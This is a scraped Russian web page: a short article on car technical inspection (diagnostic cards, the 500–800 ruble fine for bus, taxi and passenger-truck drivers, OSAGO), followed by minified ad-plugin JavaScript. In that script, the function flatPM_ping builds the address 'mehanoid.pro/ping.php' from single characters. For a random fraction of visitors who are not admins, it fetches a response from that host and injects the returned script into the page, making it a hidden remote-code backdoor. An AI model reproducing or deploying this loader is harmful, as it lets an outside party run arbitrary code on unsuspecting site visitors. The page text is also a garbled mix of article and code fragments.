Факт пройденного вовремя технического осмотра подтверждается наличием действующей диагностической карты на руках у владельца. Но постоянно иметь ее при себе обязаны лишь водители автобусов, легковых такси и грузовых автомобилей, предназначенных для транспортировки граждан. Соответственно штраф за отсутствие своевременно пройденной проверки налагается только на них. Сумма составляет 500-800 рублей.

Водители прочих видов средств передвижения освобождены от необходимости иметь при себе диагностическую карту и административная ответственность за просрочку техосмотра на таковых не распространяется.

Технический осмотр автомобиля входит в список мероприятий, обязательных к осуществлению каждым владельцем транспортного средства. По результатам проверки выдается диагностическая карта, без которой невозможно оформить страховку ОСАГО. И, разумеется, своевременная оценка состояния авто в значительной мере способствует безопасной эксплуатации средства передвижения.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}